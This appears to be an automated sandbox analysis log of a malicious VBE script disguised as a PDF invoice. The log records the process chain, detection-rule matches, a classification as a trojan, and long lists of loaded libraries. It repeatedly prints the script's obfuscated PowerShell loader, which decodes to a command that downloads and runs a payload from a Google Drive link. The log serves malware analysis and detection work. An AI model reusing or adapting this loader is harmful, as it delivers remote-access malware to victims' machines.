              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B68C6B61_2_00007FFD9B68C6B6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B68D4621_2_00007FFD9B68D462
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07496B686_2_07496B68
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0749CB106_2_0749CB10
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7327
              Source: unknownProcess created: Commandline size = 7327
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7327Jump to behavior
              Source: amsi64_3020.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_5728.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3020, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 5728, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBE@9/7@2/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Kanalseparationen.GteJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3760:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3520:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-WDQFG0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u2ws2ubf.ccr.ps1Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3020
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5728
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Faktura_82666410_1361590461#U00b7pdf.vbe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for( $Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban /India1Nglep2Preob1Fulge.,etai0Staff ';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal ';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs (Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun koFieultF mdooBjrnecAphidoLumbelTrk
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for( $Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban /India1Nglep2Preob1Fulge.,etai0Staff ';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal ';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs (Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun koFieultF mdooBjrnecAphidoLumbelTrk
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
              Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#ubekendt Ninety Drmaatters #>;$Autoradiogramme='Stivningernes84';<#Prolonging Fibromets Verbigerative #>;$omphacite=$host.PrivateData;If ($omphacite) {$Okolehao++;}function Kolonnetypernes($aldis){$aneurin=$Drawbeam+$aldis.Length-$Okolehao;for( $Nonnormalness=5;$Nonnormalness -lt $aneurin;$Nonnormalness+=6){$Befolkningsgruppernes+=$aldis[$Nonnormalness];}$Befolkningsgruppernes;}function Sibs($Venezuelaneren){ & ($Dkstolens70) ($Venezuelaneren);}$dyingness=Kolonnetypernes 'Prom MBengtoTs bazMejeniPowwolUnc.al ettaaDurst/s,ide5Beskr.Trian0Sejrs Go f(AntepWOplseiDueurnProgrdUge aoDorsow BekrsRe ta OperaN UngdT pest Incit1Mic e0Elect.F den0Indvi;Semin ModstWVid iiF rfrn oste6L ftt4 Hy,d;Prana Photx Term6Udski4Ru id;Han s Ve jurCry,ev Kryd:b.vge1.mbry2sekst1,arad.,enry0Halmk)Breve PoelsGBe,raeStoddc Ko skRemedo Azte/Panto2Kroku0Be.be1 orle0Overg0foll.1Fjert0Ubrug1 Unba grsenF aceti Overr onaeAlgerfSub,noSlagkxAban /India1Nglep2Preob1Fulge.,etai0Staff ';$Originalfabrikken=Kolonnetypernes 'Ful ku ngueSboligeThickrSyna -SakraaSt,aagParage rapnIndskTNo,pa ';$Aphagia=Kolonnetypernes 'kara,hTvelytvarict IdeapVausys Gui :Lunch/Grans/Kitchd ,agnr PeriiG ngbvStopheFluor.A ecdgTariro Slu oOxalig Formltyphle Ho t. DanscOrgano elvbmHipli/Ev ntuHumanc unbl?KondeeKntrexMargupinteroGenrerLinjetJudge=DividdObtruoProt wFj rdnNedsal TrusoSpildaPal idJogge&F erniStrafdPrees=s.wbw1Tenni2 T,lblCoa,jzFogedUTi,syxExiteLL itnYAregeyStj rsS utanNightAA rikH OutsgPlade1 stvl2 katunitr ORu.otMSpineX owsnbTotal7Bughuut ngsESang y MisgO .amdaK ediJTotalCTangaA OvntNUnhorHPengeHAlkal ';$melaena=Kolonnetypernes ' ra l> .epo ';$Dkstolens70=Kolonnetypernes 'MarguI ShineUndelXAtoni ';$Paddehat='Culturises';$Helbredsundersoegelse='\Kanalseparationen.Gte';Sibs (Kolonnetypernes ' pee$ Agamg LagrlH.drooR ccybLgenpaSpermlAquaf:StatiT elevoTubatrHybris tieriYd.rlo BrennAktivsLydreasan efUnobsf Drjej.ombaeRect d skolrtrffei Ti.gn.angegSml re Guddn,rssa= Band$ S.reeA,parnMicasvBif.n:BaungaShi,lpH plopSongld TricaSlagbt eanaAstro+Carpi$Mell,HSo taeSqui l ForsbKla rr ylevePraecdJakiesDjvleuSennenFicindProtoeInsa rPrim,sS ldeoDegreeWleccg UdpieAi,bilind ssLittleSnobs ');Sibs (Kolonnetypernes 'Beska$Subspg Egoil rochoEk,tebAssora .ortlPint :A droKgidserRe evaSymphmTelefmMic.oe PyronVaretdL bane Flde=H nga$Jell ADemurpLogichT eera InergSttteiSpiriaPolys..ntagsheedhpArvealTr boiHjesttBe nd(Addit$M uthmomklaeFintelAgilma TetreFortan Mecha Dyre) T er ');Sibs (Kolonnetypernes ' .all[ DataNCykrmeG,nert Fib .SvrmeSStr be Sutlr ,armvHududiUdmalcKopule.lycgPTr inoFastiiCanonnForsttBrac.M BrydaContrnM teraEcholgNonadeSc rirYells]Whitt:Downc:AnkomSDojigeBist cChioluStatsrWeddii SpdbtNonsey,pkkePkontrr Spu oHegnstPro,roRaketcG.ngeoTempul.loug Burre=Outwi Vele [SejltNAvahieKommutIsopy.DatamSsv,neeSvindcMundau Cr mr Se si SubptAfvigyMtlooPOmnibrRun koFieultF mdooBjrnecAphidoLumbelTrkJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
